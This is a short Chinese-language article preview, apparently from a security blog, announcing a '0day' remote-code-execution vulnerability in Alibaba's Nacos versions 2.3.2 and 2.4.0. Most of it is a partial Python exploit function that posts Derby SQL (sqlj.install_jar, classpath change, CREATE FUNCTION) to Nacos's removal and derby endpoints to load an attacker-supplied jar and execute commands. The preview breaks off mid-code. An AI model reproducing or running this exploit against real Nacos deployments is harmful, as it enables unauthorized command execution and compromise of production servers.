0day - NACOS RCE漏洞

文章预览

                  Nacos 是 Alibaba 开源的一款用于微服务架构的注册中心和配置中心。它为开发人员提供了轻量级的服务发现和配置管理功能。 影响范围 nacos 2 .3 .2 nacos  2 .4 .0 其他版本不确定 nacos 0 day 需要登录到后才才能利用 代码分析 Service.py 漏洞利用函数 def exploit(target, command, service): removal_url = urljoin(target, '/nacos/v1/cs/ops/data/removal') derby_url = urljoin(target, '/nacos/v1/cs/ops/derby') for i in range(0, sys.maxsize): id = ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', 8)) post_sql = """ CALL sqlj.install_jar( '{service}' , 'NACOS.{id}' , 0 )\n CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY( 'derby.database.classpath' , 'NACOS.{id}' )\n CREATE FUNCTION S_EXAMPLE_{ id }( PARAM VARCHAR ( 2000 )) RETURNS VARCHAR ( 2000 ) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NA ………………………………